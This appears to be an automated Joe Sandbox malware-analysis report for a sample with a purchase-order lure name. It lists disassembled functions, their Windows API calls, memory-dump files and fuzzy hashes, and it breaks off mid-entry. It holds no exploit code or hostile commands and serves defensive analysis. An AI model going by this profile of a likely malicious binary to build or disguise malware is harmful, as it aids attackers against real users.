                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ColorLongModeObjectStockTextWindow
                          • String ID:
                          • API String ID: 2960364272-0
                          • Opcode ID: 64837134a7baea086ff7c1bc825d3fc40cc95fed36e5f19dac66a3fa64c4cb2f
                          • Instruction ID: 3896f8c7677176f6f3bacc8a05e2fbb4399f2524ed4e7fbe7449456470ca13aa
                          • Opcode Fuzzy Hash: 64837134a7baea086ff7c1bc825d3fc40cc95fed36e5f19dac66a3fa64c4cb2f
                          • Instruction Fuzzy Hash: 4F112B3194E2445BCB264F24EC75AFA3B54AB03371748415FE5428A1A2D6A149C1EBD2
                          Function 00F61A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00F61A47
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F61A59
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F61A6F
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F61A8A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: de33ccf438ca9a080901550f21c143ccbb9ffe45c131be17e5f9f2f4455ec848
                          • Instruction ID: a0050ade9c3d82dd137d2bc3453868a0992448a53f7974ccb23488414181a7dc
                          • Opcode Fuzzy Hash: de33ccf438ca9a080901550f21c143ccbb9ffe45c131be17e5f9f2f4455ec848
                          • Instruction Fuzzy Hash: F811F73AD01219FFEB11DBA5CD85FADBB78FB08750F240492EA04B7290D6716E50EB94
                          Function 00F6E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 00F6E1FD
                          • MessageBoxW.USER32(?,?,?,?), ref: 00F6E230
                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00F6E246
                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00F6E24D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                          • String ID:
                          • API String ID: 2880819207-0
                          • Opcode ID: 3c477574f7bca232a2a2dcb52795d676e6d961939861b79f4e0f931c5b41a263
                          • Instruction ID: e87f406586a9f91ea02b95f66fd3ffe9a36e01b077bd9a2ddd3c84e663262baf
                          • Opcode Fuzzy Hash: 3c477574f7bca232a2a2dcb52795d676e6d961939861b79f4e0f931c5b41a263
                          • Instruction Fuzzy Hash: CF11D677D0425CBFD7019FB8EC09A9E7FAEAB45320F044256F924E3291D6B1CE04A7A1
                          Function 00F2D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                          Download Yara Rule
                          APIs
                          • CreateThread.KERNEL32(00000000,?,00F2CFF9,00000000,00000004,00000000), ref: 00F2D218
                          • GetLastError.KERNEL32 ref: 00F2D224
                          • __dosmaperr.LIBCMT ref: 00F2D22B
                          • ResumeThread.KERNEL32(00000000), ref: 00F2D249
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Thread$CreateErrorLastResume__dosmaperr
                          • String ID:
                          • API String ID: 173952441-0
                          • Opcode ID: 027de90fe72ba8620b645a8aaaf93a5111709153ea6433e0f97a9df25a11e36f
                          • Instruction ID: 0fc46561468f52f00b9698ccff9406fc4f2a1d7cf44b0292259d472131a0a391
                          • Opcode Fuzzy Hash: 027de90fe72ba8620b645a8aaaf93a5111709153ea6433e0f97a9df25a11e36f
                          • Instruction Fuzzy Hash: 5301F536805228FBDB215BA5FC09BAE7A6DEF82330F100229F925961D0CF74C901F6E0
                          Function 00F99EF3 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F19BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F19BB2
                          • GetClientRect.USER32(?,?), ref: 00F99F31
                          • GetCursorPos.USER32(?), ref: 00F99F3B
                          • ScreenToClient.USER32(?,?), ref: 00F99F46
                          • DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 00F99F7A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Client$CursorLongProcRectScreenWindow
                          • String ID:
                          • API String ID: 4127811313-0
                          • Opcode ID: a8a931897aaa7118f55cb28af145b78538aed6600c00e089a9ccf9ea76a9832c
                          • Instruction ID: 31f3b9d19e5d97423d6835981e1787e1aaaff8dd520794c0142e1d96b93e3a3d
                          • Opcode Fuzzy Hash: a8a931897aaa7118f55cb28af145b78538aed6600c00e089a9ccf9ea76a9832c
                          • Instruction Fuzzy Hash: C411483290461EABEF10DFA8C8459EEB7BDFB45315F01045AF911E3150D374BA81EBA1
                          Function 00F0600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                          Download Yara Rule
                          APIs
                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F0604C
                          • GetStockObject.GDI32(00000011), ref: 00F06060
                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F0606A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CreateMessageObjectSendStockWindow
                          • String ID:
                          • API String ID: 3970641297-0
                          • Opcode ID: dbbef9508eb8390b57eab8dc2c0672f1b46e21bb5e3b1b08dc94b7c701660bf3
                          • Instruction ID: df8a88e258aebac38d98a6b0381f4f82d222095785606e4fd1ba8e70fdd7c90a
                          • Opcode Fuzzy Hash: dbbef9508eb8390b57eab8dc2c0672f1b46e21bb5e3b1b08dc94b7c701660bf3
                          • Instruction Fuzzy Hash: 4A115B72941509BFEF224FA49C54AEABB69EF083A4F040216FA1492150D7329C60BBA1
                          Function 00F23B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • ___BuildCatchObject.LIBVCRUNTIME ref: 00F23B56
                            • Part of subcall function 00F23AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00F23AD2
                            • Part of subcall function 00F23AA3: ___AdjustPointer.LIBCMT ref: 00F23AED
                          • _UnwindNestedFrames.LIBCMT ref: 00F23B6B
                          • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00F23B7C
                          • CallCatchBlock.LIBVCRUNTIME ref: 00F23BA4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                          • String ID:
                          • API String ID: 737400349-0
                          • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                          • Instruction ID: 85ae9661b40567b470742fba57e9d7e26bde56daae709b9a01aa3cf028f12327
                          • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                          • Instruction Fuzzy Hash: 57012D72500158BBDF119E95DC42DEB3F69EF88754F044014FE4856121C73AE961EBA0
                          Function 00F33073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00F013C6,00000000,00000000,?,00F3301A,00F013C6,00000000,00000000,00000000,?,00F3328B,00000006,FlsSetValue), ref: 00F330A5
                          • GetLastError.KERNEL32(?,00F3301A,00F013C6,00000000,00000000,00000000,?,00F3328B,00000006,FlsSetValue,00FA2290,FlsSetValue,00000000,00000364,?,00F32E46), ref: 00F330B1
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00F3301A,00F013C6,00000000,00000000,00000000,?,00F3328B,00000006,FlsSetValue,00FA2290,FlsSetValue,00000000), ref: 00F330BF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: LibraryLoad$ErrorLast
                          • String ID:
                          • API String ID: 3177248105-0
                          • Opcode ID: ebec15c8c131edd39f7ce6fce7a3098c47eae34154bf6656d89f9dbc49312dfc
                          • Instruction ID: 002708229ff432d039b34cc63f33a7f574dcb940ddee141a77c75306910d7331
                          • Opcode Fuzzy Hash: ebec15c8c131edd39f7ce6fce7a3098c47eae34154bf6656d89f9dbc49312dfc
                          • Instruction Fuzzy Hash: 2A012BB2701626ABCB35CB79AC84A577B98EF05B75F210621F905E7250C721D901E6E0
                          Function 00F67464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00F6747F
                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00F67497
                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00F674AC
                          • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00F674CA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Type$Register$FileLoadModuleNameUser
                          • String ID:
                          • API String ID: 1352324309-0
                          • Opcode ID: a3915f477d75aedc11e65bf03d5c94b73d804f421593bb701881207229405336
                          • Instruction ID: dbeaed6a5ffad07d78b04260553ed958294509f4651704c67114bf8ffb4ff2a6
                          • Opcode Fuzzy Hash: a3915f477d75aedc11e65bf03d5c94b73d804f421593bb701881207229405336
                          • Instruction Fuzzy Hash: 061161B5205315DBE720DF14DD0DB927BFCEB40B08F10856AA656D7191DB74E904EBA0
                          Function 00F6B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                          Download Yara Rule
                          APIs
                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00F6ACD3,?,00008000), ref: 00F6B0C4
                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F6ACD3,?,00008000), ref: 00F6B0E9
                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00F6ACD3,?,00008000), ref: 00F6B0F3
                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F6ACD3,?,00008000), ref: 00F6B126
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CounterPerformanceQuerySleep
                          • String ID:
                          • API String ID: 2875609808-0
                          • Opcode ID: 3ee9e98f78cc918dff6d161cad59e9fa04d599bab80879c0ac9b00fcfc76b9a4
                          • Instruction ID: 32aa3e017ce0da1576cefb0eca7eb205cc5c9b019da541283d665d8a4630c297
                          • Opcode Fuzzy Hash: 3ee9e98f78cc918dff6d161cad59e9fa04d599bab80879c0ac9b00fcfc76b9a4
                          • Instruction Fuzzy Hash: 58115E31C0151CE7CF009FE5DA596EEBF78FF0A711F104086D941B2185CB3095D0AB95
                          Function 00F62DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00F62DC5
                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F62DD6
                          • GetCurrentThreadId.KERNEL32 ref: 00F62DDD
                          • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00F62DE4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                          • String ID:
                          • API String ID: 2710830443-0
                          • Opcode ID: 80dad409faaf43d6a06b709395636caf4e6edf146ee3fe1c0e5b31e1c44123d6
                          • Instruction ID: 6e59f6f06aef48ec12b4e08182ef19010aa583fb8fb1a568b235df35ca1e8c26
                          • Opcode Fuzzy Hash: 80dad409faaf43d6a06b709395636caf4e6edf146ee3fe1c0e5b31e1c44123d6
                          • Instruction Fuzzy Hash: 8AE012725016287BDB201B739C0DFEB7E6CEF56BB1F400516F509D10909AA5C941E6F1
                          Function 00F98863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F19639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F19693
                            • Part of subcall function 00F19639: SelectObject.GDI32(?,00000000), ref: 00F196A2
                            • Part of subcall function 00F19639: BeginPath.GDI32(?), ref: 00F196B9
                            • Part of subcall function 00F19639: SelectObject.GDI32(?,00000000), ref: 00F196E2
                          • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00F98887
                          • LineTo.GDI32(?,?,?), ref: 00F98894
                          • EndPath.GDI32(?), ref: 00F988A4
                          • StrokePath.GDI32(?), ref: 00F988B2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                          • String ID:
                          • API String ID: 1539411459-0
                          • Opcode ID: cdcffea574ad87888e98e17e7956a711d4c814e2d513fc8093a61106919c9dd3
                          • Instruction ID: 4997cd16d8aa049d4542904bbf19eb0dc4e31fe0cb4282ab611ebe3655c99d55
                          • Opcode Fuzzy Hash: cdcffea574ad87888e98e17e7956a711d4c814e2d513fc8093a61106919c9dd3
                          • Instruction Fuzzy Hash: EAF05E3604625CFAEB126F94AC09FCE3F59AF06310F048002FA11A50E1C7B55552EFF9
                          Function 00F198B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                          Download Yara Rule
                          APIs
                          • GetSysColor.USER32(00000008), ref: 00F198CC
                          • SetTextColor.GDI32(?,?), ref: 00F198D6
                          • SetBkMode.GDI32(?,00000001), ref: 00F198E9
                          • GetStockObject.GDI32(00000005), ref: 00F198F1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Color$ModeObjectStockText
                          • String ID:
                          • API String ID: 4037423528-0
                          • Opcode ID: 58cca026f6e842a74e0a677c524d9a5d10b10a0f0d5caabd72e746f6cd20776c
                          • Instruction ID: 9bc8d5082b5f83a53c064c25ab37bdaf11e8885056f47cf43737a228dc9e8e41
                          • Opcode Fuzzy Hash: 58cca026f6e842a74e0a677c524d9a5d10b10a0f0d5caabd72e746f6cd20776c
                          • Instruction Fuzzy Hash: 99E06531644284ABDB215B74BC09BD83F10AB11736F08821AF7FA540E1C7714684AB50
                          Function 00F6162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentThread.KERNEL32 ref: 00F61634
                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,00F611D9), ref: 00F6163B
                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00F611D9), ref: 00F61648
                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,00F611D9), ref: 00F6164F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CurrentOpenProcessThreadToken
                          • String ID:
                          • API String ID: 3974789173-0
                          • Opcode ID: 28e6e15edf1dd9954433225e5b8d6b4ff6c551adf35ae3db9b2a2f94aa47b1b1
                          • Instruction ID: f846c16f3a96df687bc89bb1e81da9754ecdef1f53f3a32d41c3cff163c22b8e
                          • Opcode Fuzzy Hash: 28e6e15edf1dd9954433225e5b8d6b4ff6c551adf35ae3db9b2a2f94aa47b1b1
                          • Instruction Fuzzy Hash: 0EE08635A01215EBD7201FA0DE0DB463B7CBF447A1F188809F245C9090D6354440E7A0
                          Function 00F5D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                          Download Yara Rule
                          APIs
                          • GetDesktopWindow.USER32 ref: 00F5D858
                          • GetDC.USER32(00000000), ref: 00F5D862
                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F5D882
                          • ReleaseDC.USER32(?), ref: 00F5D8A3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CapsDesktopDeviceReleaseWindow
                          • String ID:
                          • API String ID: 2889604237-0
                          • Opcode ID: 768cbeb7963adf1b312723f099b8be5848788610e6179a503c780aea6dd78189
                          • Instruction ID: 84d6d150172abd2bca5023cb0d3e0cbe3fd9ee9d97412d3f5f4e39aa43c82c38
                          • Opcode Fuzzy Hash: 768cbeb7963adf1b312723f099b8be5848788610e6179a503c780aea6dd78189
                          • Instruction Fuzzy Hash: ECE09AB5800209DFCF519FA0D90866DBBB5FB08311F14845AE94AE7250CB399945BF91
                          Function 00F5D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                          Download Yara Rule
                          APIs
                          • GetDesktopWindow.USER32 ref: 00F5D86C
                          • GetDC.USER32(00000000), ref: 00F5D876
                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F5D882
                          • ReleaseDC.USER32(?), ref: 00F5D8A3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CapsDesktopDeviceReleaseWindow
                          • String ID:
                          • API String ID: 2889604237-0
                          • Opcode ID: e024ae9a7de95367199fe56c42aa678efa4cfedaf325964c1a13b9d8ea487472
                          • Instruction ID: 3e631b5501cc7eb400eb9680ebf429dd66756fd3f3317d376b9f5b9cc6e6169a
                          • Opcode Fuzzy Hash: e024ae9a7de95367199fe56c42aa678efa4cfedaf325964c1a13b9d8ea487472
                          • Instruction Fuzzy Hash: ACE092B5800209EFCF51AFA0D80866DBBB5BB08311F14844AE94AE7260CB399945BF90
                          Function 00F74D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F07620: _wcslen.LIBCMT ref: 00F07625
                          • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00F74ED4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
